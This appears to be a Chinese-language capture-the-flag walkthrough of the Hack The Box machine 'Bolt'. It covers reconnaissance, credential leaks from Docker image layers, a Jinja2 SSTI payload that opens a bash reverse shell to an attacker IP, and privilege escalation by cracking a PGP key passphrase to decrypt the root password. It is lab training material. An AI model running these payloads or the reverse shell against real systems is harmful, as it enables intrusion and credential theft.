0x01 信息收集
─# nmap 10.10.11.114 -p- -sC -sV --min-rate=2000Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-14 08:34 ESTNmap scan report for 10.10.11.114Host is up (0.31s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)| 256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)|_ 256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)80/tcp open http nginx 1.18.0 (Ubuntu)|_http-title: Starter Website - About|_http-server-header: nginx/1.18.0 (Ubuntu)443/tcp open ssl/http nginx 1.18.0 (Ubuntu)| http-title: Passbolt | Open source password manager for teams|_Requested resource was /auth/login?redirect=%2F| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU| Not valid before: 2021-02-24T19:11:23|_Not valid after: 2022-02-24T19:11:23|_http-server-header: nginx/1.18.0 (Ubuntu)|_ssl-date: TLS randomness does not represent timeService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 70.73 seconds
访问网站又一个登录口,还可以创建账户。走一个。不行。有报错
打开后发现是几个虚拟机镜像,有一些信息泄露
0x02 漏洞挖掘
─# cat repositories
{"flask-dashboard-adminlte_appseed-app":{"latest":"3350815d3bdf21771408f91da4551ca6f4e82edce74e9352ed75c2e8a5e68162"}}
这里说,最后一个版本是 xxx。进入目录app/base/__pycache__下发现两个pyc文件。反编译后代码如下:
pip3 install uncompyle6 -i https://pypi.tuna.tsinghua.edu.cn/simple/
当作知识点吧。反编译根源码还是差点。下面发现了源码贴了上来
# -*- encoding: utf-8 -*-"""Copyright (c) 2019 - present AppSeed.us"""from flask import jsonify, render_template, redirect, request, url_forfrom flask_login import (current_user,login_required,login_user,logout_user)from app import db, login_managerfrom app.base import blueprintfrom app.base.forms import LoginForm, CreateAccountFormfrom app.base.models import Userfrom hmac import compare_digest as compare_hashimport cryptdef route_default():return redirect(url_for('base_blueprint.login'))## Login & Registrationdef login():login_form = LoginForm(request.form)if 'login' in request.form:# read form datausername = request.form['username']password = request.form['password']# Locate useruser = User.query.filter_by(username=username).first()# Check the passwordstored_password = user.passwordstored_password = stored_password.decode('utf-8')if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):login_user(user)return redirect(url_for('base_blueprint.route_default'))# Something (user or pass) is not okreturn render_template( 'accounts/login.html', msg='Wrong user or password', form=login_form)if not current_user.is_authenticated:return render_template( 'accounts/login.html',form=login_form)return redirect(url_for('home_blueprint.index'))def register():login_form = LoginForm(request.form)create_account_form = CreateAccountForm(request.form)if 'register' in request.form:username = request.form['username']email = request.form['email' ]data = User.query.filter_by(email=email).first()if data is None:# Check usename existsuser = User.query.filter_by(username=username).first()if user:return render_template( 'accounts/register.html',msg='Username already registered',success=False,form=create_account_form)# Check email existsuser = User.query.filter_by(email=email).first()if user:return render_template( 'accounts/register.html',msg='Email already registered',success=False,form=create_account_form)# else we can create the useruser = User(**request.form)db.session.add(user)db.session.commit()return render_template( 'accounts/register.html',msg='User created please <a href="/login">login</a>',success=True,form=create_account_form)else:return render_template( 'accounts/register.html', form=create_account_form)def logout():logout_user()return redirect(url_for('base_blueprint.login'))## Errorsdef unauthorized_handler():return render_template('page-403.html'), 403def access_forbidden(error):return render_template('page-403.html'), 403def not_found_error(error):return render_template('page-404.html'), 404def internal_error(error):return render_template('page-500.html'), 500
└─# cat forms.py# uncompyle6 version 3.8.0# Python bytecode 3.6 (3379)# Decompiled from: Python 3.9.7 (default, Sep 24 2021, 09:43:00)# [GCC 10.3.0]# Embedded file name: /app/base/forms.py# Compiled at: 2021-03-05 12:48:36# Size of source mod 2**32: 791 bytes"""Copyright (c) 2019 - present AppSeed.us"""from flask_wtf import FlaskFormfrom wtforms import TextField, PasswordFieldfrom wtforms.validators import InputRequired, Email, DataRequiredclass LoginForm(FlaskForm):username = TextField('Username', id='username_login', validators=[DataRequired()])password = PasswordField('Password', id='pwd_login', validators=[DataRequired()])class CreateAccountForm(FlaskForm):username = TextField('Username', id='username_create', validators=[DataRequired()])email = TextField('Email', id='email_create', validators=[DataRequired(), Email()])password = PasswordField('Password', id='pwd_create', validators=[DataRequired()])# okay decompiling forms.cpython-36.pyc
东西太多, 先看哪些重要的
for i in a:
os.system("tar -tvf"+i)
几个特殊的文件列一下:
a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar-rw-r--r-- root/root 16384 2021-03-05 12:44 db.sqlite32265c5097f0b290a53b7556fd5d721ffad8a4921bfc2a6e378c04859185d27fa/layer.tar-rw-r--r-- root/root 791 2021-03-05 12:48 app/base/forms.py-rw-r--r-- root/root 3778 2021-03-05 12:49 app/base/routes.py745959c3a65c3899f9e1a5319ee5500f199e0cadf8d487b92e2f297441f8c5cf/layer.tar-rw-r--r-- root/root 142 2021-03-05 06:11 .env-rw-r--r-- root/root 1448 2021-03-05 09:22 config.py-rw-r--r-- root/root 198 2021-03-05 06:11 gunicorn-cfg.py-rw-r--r-- root/root 116 2021-03-05 07:40 requirements.txt-rw-r--r-- root/root 955 2021-03-05 06:11 run.py
在config.py文件中有一个sqllite3连接和postfreSQl数据库的账号密码。
#PostgreSQL database
SQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(
config( 'DB_ENGINE' , default='postgresql' ),
config( 'DB_USERNAME' , default='appseed' ),
config( 'DB_PASS' , default='pass' ),
config( 'DB_HOST' , default='localhost' ),
config( 'DB_PORT' , default=5432 ),
config( 'DB_NAME' , default='appseed-flask' )
)
admin [email protected] $1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.
密码密文。通过接口login可以发现接口是这样加密的
# read form datausername = request.form['username']password = request.form['password']# Locate useruser = User.query.filter_by(username=username).first()# Check the passwordstored_password = user.passwordstored_password = stored_password.decode('utf-8')if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):login_user(user)return redirect(url_for('base_blueprint.route_default'))
根据代码逻辑,关键在于使用username 查询后创建了一个user对象。用户登录的条件是用户存在,且用户密码和用户原始密码(用密文当盐)的加密相比的,竟然能等于原来的值。一脸懵逼。解密出如下密码:
admin/deadbolt
到这里感觉没东西了
扫描一下vhost,找到两个子域名 demo 和mail。
现在有三个网站了。
demo.bolt.htb#一个登录界面,能够创建用户,需要一个invite code
mail.boot.htb #一个登录界面
passbolt.bolt.htb AdminLTE3
在config.py中还配置了一个SECRET_KEY default='S#perS3crEt_007'。
尝试一下不行
找了好久找到了
'XNSS-HSJW-3NGU-8XTJ'
curl -i -s -k -X $'POST'
-H $'Host: demo.bolt.htb'
--data-binary $'x0dx0ausername=123&[email protected]&password=123&invite_code=XNSS-HSJW-3NGU-8XTJ'
$'http://demo.bolt.htb/register'
注册后发现可以登录mail,mail应该是一个邮件服务器。
邮件服务可以登录,发现修改一下配置,会收到一个邮件???因为是pyhon的尝试模版注入。
点击后,发现一个新的邮件,出现了10000,说明name参数处存在SSTI注入漏洞。
{{"".__class__.__bases__[0].__subclasses__()}}
查看到 popen是223个
{{"".__class__.__bases__[0].__subclasses__()[222]}}
<class 'subprocess.Popen'>
最终调用初始化,发现不行。
{{"".__class__.__bases__[0].__subclasses__()[222].__init__}}
<slot wrapper '__init__' of 'object' objects>
由于使用了模板jinja2,尝试搜了下payload:
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen("whoami").read()}}www-data
0x03 获取权限
同样的方法发送payload:
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.50/4444 0>&1"').read() }}└─# nc -lvnp 4444listening on [any] 4444 ...connect to [10.10.14.50] from (UNKNOWN) [10.10.11.114] 50808bash: cannot set terminal process group (1012): Inappropriate ioctl for devicebash: no job control in this shellwww-data@bolt:~/demo$ ididuid=33(www-data) gid=33(www-data) groups=33(www-data)www-data@bolt:~/demo$ whoamiwhoamiwww-data
0x04 权限提升
www-data@bolt:~/demo$ cat /etc/passwd|grep -v nologin |grep -v falsecat /etc/passwd|grep -v nologin |grep -v falseroot:x:0:0:root:/root:/bin/bashsync:x:4:65534:sync:/bin:/bin/synceddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bashclark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash
www-data ->eddie
[-] /etc/init/ config file permissions:total 24drwxr-xr-x 2 root root 4096 Sep 9 10:07 .drwxr-xr-x 135 root root 12288 Sep 20 15:05 ..-rw-r--r-- 1 root root 1757 Nov 6 2019 mysql.conf-rw-r--r-- 1 root root 453 Dec 2 2020 whoopsie.conf
[-] Any interesting mail in /var/mail:total 24drwxrwsr-x 3 root mail 4096 Dec 17 00:27 .drwxr-xr-x 15 root root 4096 Aug 4 13:06 ..drwx--S--- 5 5001 mail 4096 Dec 19 08:23 123-rw------- 1 eddie mail 909 Feb 25 2021 eddie-rw------- 1 root mail 1 Mar 3 2021 root-rw------- 1 www-data mail 1 Mar 3 2021 www-data
没找到什么可利用的点。
根据用户查文件:
www-data@bolt:/var/lib/passbolt/tmp$ find /etc -user www-data 2>/dev/nullfind /etc -user www-data 2>/dev/null/etc/passbolt/Seeds
/etc/passbolt/Seeds在passbolt.php 中存在一个passwd: rT2;jW7<eY8!dX8}pQ8%有如下关键信息:
return ['App' => [// A base URL to use for absolute links.// The url where the passbolt instance will be reachable to your end users.// This information is need to render images in emails for example'fullBaseUrl' => 'https://passbolt.bolt.htb',],// Database configuration.'Datasources' => ['default' => ['host' => 'localhost','port' => '3306','username' => 'passbolt','password' => 'rT2;jW7<eY8!dX8}pQ8%','database' => 'passboltdb',],],
数据库连接上,没什么关键信息。
select * from users;+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+| id | role_id | username | active | deleted | created | modified |+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+| 4e184ee6-e436-47fb-91c9-dccb57f250bc | 1cfcd300-0664-407e-85e6-c11664a7d86c | [email protected] | 1 | 0 | 2021-02-25 21:42:50 | 2021-02-25 21:55:06 || 9d8a0452-53dc-4640-b3a7-9a3d86b0ff90 | 975b9a56-b1b1-453c-9362-c238a85dad76 | [email protected] | 1 | 0 | 2021-02-25 21:40:29 | 2021-02-25 21:42:32 |
还有一个奇怪的东西
-----BEGIN PGP MESSAGE-----Version: OpenPGP.js v4.10.9Comment: https://openpgpjs.orgwcBMA/ZcqHmj13/kAQgAkS/2GvYLxglAIQpzFCydAPOj6QwdVV5BR17W5pscg/ajGlQbkE6wgmpoV7HuyABUjgrNYwZGN7ak2Pkb+/3LZgtpV/PJCAD030kYpCLSEEzPBiIGQ9VauHpATf8YZnwK1JwO/BQnpJUJV71YOon6PNV71T2zFr3HoAFbR/wPyF6Lpkwy56u3A2A6lbDb3sRl/SVIj6xtXn+fICeHjvYEm2IrE4Pxl+DjN5Nf4aqxEheWzmJwcyYqTsZLMtw+rnBlLYOaGRaa8nWmcUlMrLYD218RzyL8zZw0AEo6aOToteDPchiIMqjuExsqjG71CO1ohIIlnlK602+x7/8b7nQpedLA7wF8tR9g8Tpy+ToQOozGKBy/auqOHO66vA1EKJkYSZzMXxnp45XA38+ul0/OwtBNuNHreOIH090dHXx69IsyrYXt9dAbFhvbWr6eP/MIgh5I0RkYwGCtoPeQehKMPkCzyQl6Ren4iKS+F+L207kwqZ+jP8uEn3nauCmm64pcvy/RZJp7FUlT7Sc0hmZRIRQJ2U9vK2V63Yre0hfAj0f8F50cRR+v+BMLFNJVQ6Ck3Nov8fG5otsEteRjkc58itOGQ38EsnH3sJ3WuDw8ifeR/+K72r39WiBEiE2WHVey5nOF6WEnUOz0j0CKoFzQgri9YyK6CZ3519x3amBTgITmKPfgRsMy2OWU/7tYNdLxO3vh2Eht7tqqpzJwW0CkniTLcfrzP++0cHgAKF2tkTQtLO6QOdpzIH5aIebmi/MVUAw3a9J+qeVvjdtvb2fKCSgEYY4ny992ov5nTKSH9Hi1ny2vrBhsnO9/aqEQ+2tE60QFsa2dbAAn7QKk8VE2B05jBGSLa0H7xQxshwSQYnHaJCE6TQtOIti4o2sKEAFQnf7RDgpWeugbn/vphihSA984=P38i-----END PGP MESSAGE-----
eddie ->root
OpenPGP是一个加密工具。
比之前多了一个数据库密码。尝试连接切换用户。
其中eddie用户成功。
在邮件中发现有收到来自Clark的用户的邮件,邮件里提到密码管理系统和私钥备份。邮件如下:
eddie@bolt:/var/mail$ cat eddiecat eddieFrom [email protected] Thu Feb 25 14:20:19 2021Return-Path: <[email protected]>X-Original-To: [email protected]Delivered-To: [email protected]Received: by bolt.htb (Postfix, from userid 1001)id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)Subject: Important!To: <[email protected]>X-Mailer: mail (GNU Mailutils 3.7)Message-Id: <20210225212019[email protected]>Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)From: Clark Griswold <[email protected]>Hey Eddie,The password management server is up and running. Go ahead and download the extension to your browser and get logged in. Be sure to back up your private key because I CANNOT recover it. Your private key is the only way to recover your account.Once you're set up you can start importing your passwords. Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...-Clark
还发现了一个CVE-2021-22555
github搜了一个不行,回头再看。
还有一个信息。
══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
什么是PGP???
https://gist.github.com/jhjguxin/6037564
如果不熟悉先在本地测试。
══╣ Possible private SSH keys were found!/etc/ImageMagick-6/mime.xml/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log
在文件中找到三个公钥。。。,一个私钥,私钥如下
-----BEGIN PGP PRIVATE KEY BLOCK-----Version: OpenPGP.js v4.10.9Comment: https://openpgpjs.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cqxZ-----END PGP PRIVATE KEY BLOCK-----
在数据库中还有一个pgp message是需要解密的密文
众所周知,私钥一般有密码,尝试破解私钥的密码
-
使用
gpg2john
└─# gpg2john pri.key > tmp 1 ⨯File pri.key─# cat tmpEddie Johnson:$gpg$*1*668*2048*2b518595f971db147efe739e2716523786988fb0ee243e5981659a314dfd0779dbba8e14e6649ba4e00cc515b9b4055a9783be133817763e161b9a8d2f2741aba80bceef6024465cba02af3bccd372297a90e078aa95579afbd60b6171cd82fd1b32a9dd016175c088e7bef9b883041eaffe933383434752686688f9d235f1d26c006a698dd6cc132d8acb94c4eceebf010845d69cd9e114873538712f2cd50c8b9ca3bcb9bbc3d83e32564f99031776ac986195e643880483ac80d3f7f1b9143563418ddea7bb71d114c4f24e41134dcdac4662e934d955aeccae92038dbed32f300ac5abed65960e26486c5da59f0d17b71ad9a8fe7a5e6bb77b8c31b68b56e7f4025f01d534be45ab36a7c0818febe23fa577ca346023feefa2bfef0899dd860e05a54d8b3e8bd430f40791a52a20067fde1861d977adf222725658a4661927d65b877cb8ac977601990cfbdb27413f5acc25ff1f691556bc8e5264cffaebbea7e7b9d73de6c719e0a7b004d331eaada86e812e3db60904eaf73a1b79c6e68e74beb6b71f6d644afbf591426418976d68c4e580cbc60b6fdd113f239ae2acd1e1dc51cb74b96b3c2f082bc0214886e1c3cebb3611311d9112d61194df22fb3ceb5783ee7d4a61b544886b389f638fc85d5139f64997014ec38ac59e65b842d92afb50184ccc3549a57dcdb3fc8720cc394912aed931007b53da1c635d302e840da2e6342803831891ab1ccc1669f3cc3240b8d31eded96696d7ad1525c4d277a4d3123abecafdbdde207714539c2e546cd45c4452051394e5d00e711fa5353f817be4fa6827aa0f1428dfb93a918e93975fb4baf3297aa3b7fec33470cf2741237a629b869a762684602057f3e3e6df9c97631caa7589dc4b26653162dfb2f2cf508cbe375496ba735830c2c00f151cdd50c522afe33dbe4265d2*3*254*8*9*16*b81f0847e01fb836c8cc7c8a2af31f19*16777216*34af9ef3956d5ad8:::Eddie Johnson <[email protected]>::pri.key
-
进行破解
┌──(root💀kali)-[~/tmp]john --wordlist=/usr/share/wordlists/rockyou.txt tmpUsing default input encoding: UTF-8Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])Cost 1 (s2k-count) is 16777216 for all loaded hashesCost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 8 for all loaded hashesCost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashesWill run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusmerrychristmas (Eddie Johnson)1g 0:00:13:03 DONE (2021-12-20 11:05) 0.001277g/s 54.71p/s 54.71c/s 54.71C/s mhines..menudoUse the "--show" option to display all of the cracked passwords reliablySession completed
解密:
gpg --batch --import /tmp/pri.keygpg --pinentry-mode loopback --passphrase merrychristmas -d /tmp/pub.key{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}
切换用户到root,成功获取权限。
喜欢就请关注我们吧!
原文始发于微信公众号(承影安全团队ChengYingTeam):【HTB系列】Bolt
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论